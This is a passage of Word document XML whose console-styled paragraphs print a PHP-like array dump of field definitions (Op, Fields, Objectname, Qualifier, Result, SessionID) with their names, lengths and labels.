              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1663AEDD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="093802BF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Op' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CDFE2D"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D9CE54E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Op',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7715BCD2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F9BC2D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B4D5CC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7AEFF0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Operation',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D53BB8D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704F099B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'list',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2330630A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1254477C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46471326" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Fields' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB66E00"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4A6BDA3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Fields',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC5BC35" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD1F440" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00942188" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD70F8F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Fields',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7CC0C8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22FCAA2D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '*',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52193AF1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF70B0A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6F5028" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7562D9FB"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C516F03" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B1CB79C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67BC9657" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E06A10" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6451B536" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA1CACF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32EE3A25" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78397A33" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5011F1C9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B757E37" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Qualifier' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4577E7C9"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403E1C3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Qualifier',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F8C437" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="398C4BAC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="563FC938" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68174AF9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Qualifier',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A4264B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="145E0468" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75DBD89A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E118F73" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B8D9DC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Result' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="188AB7C6"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1CB8DB28" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Result',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ABC5828" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268EF370" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="551DE1BC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7669BF29" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Response',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D78E3D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5578AE39" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C0A869" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2709869C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337DC692" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SessionID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B3795D8"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1E7C7243" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SessionID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2738324F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31EEBC7E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC205AA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 60,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64602711" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Session ID',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57C7AEFC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2290E466" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B96D148" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
